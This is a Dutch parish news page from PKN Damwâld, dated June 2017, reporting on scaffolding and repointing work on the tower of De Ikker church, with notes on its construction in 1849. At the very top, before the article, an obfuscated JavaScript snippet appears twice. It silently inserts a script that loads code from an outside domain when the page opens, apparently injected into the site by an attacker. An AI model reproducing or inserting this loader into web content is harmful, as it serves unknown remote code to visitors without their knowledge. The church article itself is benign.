;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De Ikker in de steigers - PKN Damwâld

De Ikker in de steigers

Gepubliceerd op: maandag 19 juni 2017

Alles heeft z’n onderhoud nodig. Dus ook ons oude vertrouwde De Ikker. In 2017 is het ruim 168 jaar geleden dat de kerk is gebouwd. Een hele leeftijd voor een kerk, die ons bij onze samenkomsten jaar in jaar uit bescherming biedt tegen weer en wind. Voor de reguliere kerkganger lijkt het wel even schipperen om de kerk binnen te komen met al dat steigermateriaal voor de ingang. Maar gelukkig is de ‘normale’ opgang tot de kerk via de hoofdingang prima toegankelijk.

De Ikker aan de Hearewei in Damwâld is gebouwd in 1849 op het terrein van de toen pas afgebroken oude kerk. De laatste dienst in die oude kerk werd gehouden op 30 april 1849. Deze oude kerk had onder andere twee torens, een zadeldak- en een spitse toren. Vermoedelijk was deze kerk gebouwd in de 13e eeuw. De laatste dienst in die oude kerk werd gehouden op 30 april 1849 met als voorganger de toenmalige predikant ds. P. van Kleffens. De huidige kerk werd in 1849 gebouwd door timmerman Klaas Fokkes Osinga uit Dokkum. De eerste steen werd gelegd door de 11-jarige Lambert Willem van Kleffens, de enige zoon van Ds. Van Kleffens. Deze steen is aangebracht boven de ingang in de Westelijke muur. De inwijding, onder leiding van ds. Van Kleffens, vond plaats op 2 december 1849.

Onze kerk is gelukkig geen bouwval, maar een stuk groot onderhoud aan de toren bleek hard nodig. Samen met een aantal deskundigen van onder anderen schildersbedrijf De Zwart en timmerbedrijf A. T. De Hoop uit Damwâld zijn de kerkrentmeesters de afgelopen maanden intensief bezig geweest met het schouwen van de kerk en is er een (onderhouds-)plan van aanpak ontwikkelt.
Zoals onmiskenbaar valt te zien staat er inmiddels een huizenhoge steiger rondom de toren van De Ikker. Een deel van het voegwerk is nog prima in orde en daar hoeft dan ook niets aan te worden gedaan. Echter er zijn ook zéér slechte delen. Inmiddels is men begonnen het oude voegwerk te verwijderen en/of te herstellen; het loopt volgens plan. Omdat er verder weinig aan de spits moet worden gedaan is besloten om geen steigers rondom de spits te bouwen. De bouw rond de spits is erg complex en daarom ook erg kostbaar.
Het blijft bij een dergelijk project altijd maar weer een verrassing wat je aan zult treffen. Het is immers hoog en een plek waar je normaal nooit komt. Gebleken is dat het voeg- en verfwerk uiteraard het nodige onderhoud nodig heeft, maar dat het niet dramatisch slecht is. Het is regulier onderhoud, net zoals een huis dat zeker om de paar jaar geschilderd dient te worden. Het voegwerk van een dergelijk historisch gebouw dient om de 25 à 30 jaar te worden nagekeken.
Bij renovatie van oude gebouwen is er altijd een grote kans dat men tegen onvoorziene werkzaamheden aanloopt. Ook tijdens de renovatiewerkzaamheden aan houten kapconstructie van de torenspits van De Ikker kwamen enkele onverwachte gebreken aan het licht. Met de nodige vakmanschap zal de toren van De Ikker weer in oude glorie worden herstelt. Naar verwachting zijn de werkzaamheden voor de bouwvak afgerond.